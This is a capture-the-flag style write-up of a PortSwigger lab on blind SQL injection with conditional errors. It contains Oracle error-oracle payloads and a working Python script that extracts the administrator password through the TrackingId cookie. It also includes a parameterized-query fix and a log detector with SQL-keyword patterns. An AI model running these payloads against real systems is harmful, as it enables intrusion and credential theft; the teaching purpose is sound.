
12 - Blind SQL injection with conditional errors

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Given: injection point (TrackingId), attack type (blind), custom error, table (users), columns (username, password)
End goal: log in as the administrator user


Let's start solving the lab by capturing the request in Burp. The initial request gets a 200 OK response:

[Screenshot: Burp intercept]

As we know there is a blind SQLi in TrackingId; appending a ' to the TrackingId cookie gives a 500 Internal Server Error response:

[Screenshot: Burp intercept]

To save time, first we extract the length of the administrator user's password. The following payload uses the LENGTH function to test the length: ' and LENGTH((SELECT password From users where username='administrator'))=1--
Use Burp Intruder to brute-force the numeric value.

[Screenshot: Burp intercept]

In the output we can see a difference in the response code when the payload value becomes 20. The response code changes because the condition in the payload is true for that value:

[Screenshot: Burp intercept]
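The reason the response code can be used as an oracle is that the cookie value is concatenated into the SQL statement and a database error is surfaced as a distinct 500 response. The following is an added example, not code from the lab or from PortSwigger: it uses an in-memory sqlite3 table (a stand-in for the lab's Oracle backend, so it runs offline) to contrast the vulnerable lookup with a parameterized one, and shows that with a bound parameter the cookie content, quote included, is treated as data and the response shape never changes. The table, its single row and the helper names are constructed for this example.

```python
import sqlite3

# Constructed schema for the example: one tracking cookie row (not the lab's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (id TEXT PRIMARY KEY, hits INTEGER DEFAULT 0)")
    conn.execute("INSERT INTO tracking (id) VALUES ('P8IUnUqqZqBKVVri')")
    return conn

def lookup_vulnerable(conn, tracking_id):
    """Cookie value concatenated into the query: the pattern the lab exploits.
    Returns an HTTP-style status; a database error becomes a 500."""
    query = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"
    try:
        conn.execute(query).fetchall()
        return 200
    except sqlite3.Error:
        # The custom error page is exactly the signal the attacker reads.
        return 500

def lookup_hardened(conn, tracking_id):
    """Same lookup with a bound parameter: the cookie can only ever be a value."""
    try:
        conn.execute("SELECT id FROM tracking WHERE id = ?", (tracking_id,)).fetchall()
    except sqlite3.Error as exc:
        # Record the failure server-side; the client sees the same response either way.
        print("db error (logged, not shown to client):", exc)
    return 200

def compare(tracking_id):
    """Status code from the vulnerable and the hardened handler for one cookie value."""
    conn = make_db()
    return lookup_vulnerable(conn, tracking_id), lookup_hardened(conn, tracking_id)

if __name__ == "__main__":
    for tid in ["P8IUnUqqZqBKVVri", "P8IUnUqqZqBKVVri'", "P8IUnUqqZqBKVVri' AND 1=1--"]:
        print(repr(tid), "->", compare(tid))
```

The vulnerable handler answers 200 for the clean cookie and for the `' AND 1=1--` variant but 500 for a lone `'` (unterminated string), which is the behaviour the lab walks through; the hardened handler returns 200 for all three because no cookie value can change the statement.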

Now we have to brute-force the password. Doing this manually or with Intruder takes a long time, so I wrote a simple Python script to brute-force the characters of the password.

(Make sure to change the URL and cookie values before running.)

```python
import requests

url = "https://0a99009f03b05c2480332cd200c20039.web-security-academy.net"

# Cookies from the captured request; replace TrackingId and session with your own.
BASE_COOKIES = {'TrackingId': 'P8IUnUqqZqBKVVri', 'session': 'a09HdSQEF6PueU2Y5LyXN3TDXGPAknLn'}

# Character set tried for each password position.
char = "abcdefghijklmnopqrstuvwxyz1234567890"

def send(payload):
    """Append the payload to the TrackingId cookie and return the HTTP status code."""
    cookie = dict(BASE_COOKIES)
    cookie['TrackingId'] += payload
    return requests.get(url, cookies=cookie).status_code

def get_length():
    # Oracle: when the condition is true, TO_CHAR(1/0) raises a division-by-zero error,
    # which the application turns into a 500 response; otherwise it answers 200.
    for i in range(100):
        payload = f"'||(SELECT CASE WHEN (length((SELECT password from users where username='administrator'))={i}) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)--"
        if send(payload) == 500:
            return i
    return None

length = get_length()
print("[+] Length of password : ", length)

def get_pass(lengt):
    passwd = ""
    for i in range(1, lengt + 1):
        for c in char:
            # substr(..., i, 1) tests the i-th character; a 500 means c is correct.
            payload = f"'||(SELECT CASE WHEN (substr((SELECT password from users where username='administrator'),{i},1)='{c}') THEN TO_CHAR(1/0) ELSE NULL END FROM dual)--"
            if send(payload) == 500:
                passwd += c
                break
    return passwd

print("[+] Password is : ", get_pass(length))
```

Output:
[Screenshot: script output]
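From the defender's side, the script above leaves a recognisable trace: one session sends many requests whose TrackingId cookie keeps changing, the values contain SQL syntax, and a minority of them come back as 500. The following is an added example, not part of the lab or the original write-up: a small detector run over constructed access-log lines (a made-up single-line format that records the Cookie header) that groups requests by session and flags this pattern. The log lines, the field layout and the alert thresholds are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not real traffic): client IP, request line, status, Cookie header.
SAMPLE_LOG = """\
10.0.0.5 "GET / HTTP/1.1" 200 "TrackingId=P8IUnUqqZqBKVVri; session=s1"
10.0.0.5 "GET / HTTP/1.1" 200 "TrackingId=P8IUnUqqZqBKVVri'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)--; session=s1"
10.0.0.5 "GET / HTTP/1.1" 500 "TrackingId=P8IUnUqqZqBKVVri'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)--; session=s1"
10.0.0.9 "GET / HTTP/1.1" 200 "TrackingId=Zq1RtYx8Kp2LmNo3; session=s2"
10.0.0.9 "GET /my-account HTTP/1.1" 200 "TrackingId=Zq1RtYx8Kp2LmNo3; session=s2"
"""

# Assumed line layout for the constructed log format above.
LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')
COOKIE_RE = re.compile(r"TrackingId=([^;]*)(?:;\s*session=(\S*))?")
# A genuine tracking id is an opaque token; quotes, concatenation or SQL keywords do not belong in it.
SUSPICIOUS = re.compile(r"'|\|\||--|\bSELECT\b|\bCASE\b|1/0", re.IGNORECASE)

def analyze(log_text, min_requests=3):
    """Return {session: evidence} for sessions showing the cookie-brute-force pattern."""
    sessions = defaultdict(lambda: {"requests": 0, "tracking_ids": set(), "errors": 0, "suspicious": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, _path, status, cookies = m.groups()
        c = COOKIE_RE.search(cookies)
        if not c:
            continue
        tracking_id, session = c.group(1), c.group(2) or ip  # fall back to IP without a session cookie
        s = sessions[session]
        s["requests"] += 1
        s["tracking_ids"].add(tracking_id)
        if status == "500":
            s["errors"] += 1
        if SUSPICIOUS.search(tracking_id):
            s["suspicious"] += 1

    alerts = {}
    for session, s in sessions.items():
        # A real client keeps one tracking id; varying, SQL-looking values across
        # several requests is the enumeration pattern, with 500s as supporting evidence.
        if s["requests"] >= min_requests and s["suspicious"] > 0 and len(s["tracking_ids"]) > 1:
            alerts[session] = {
                "requests": s["requests"],
                "distinct_tracking_ids": len(s["tracking_ids"]),
                "errors": s["errors"],
                "suspicious": s["suspicious"],
            }
    return alerts

if __name__ == "__main__":
    for session, evidence in analyze(SAMPLE_LOG).items():
        print(f"[!] session {session}: {evidence}")
```

Session s1 is reported with three requests, three distinct TrackingId values, two suspicious values and one 500; session s2, which reuses a single opaque id, is not. In a real deployment the thresholds would be tuned to the site's traffic, and the 500 ratio is the most specific signal of the conditional-error technique.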

Now that we have the administrator user's password, go to My account and log in with these credentials to solve the lab.
Lab solved:

[Screenshot: Burp intercept]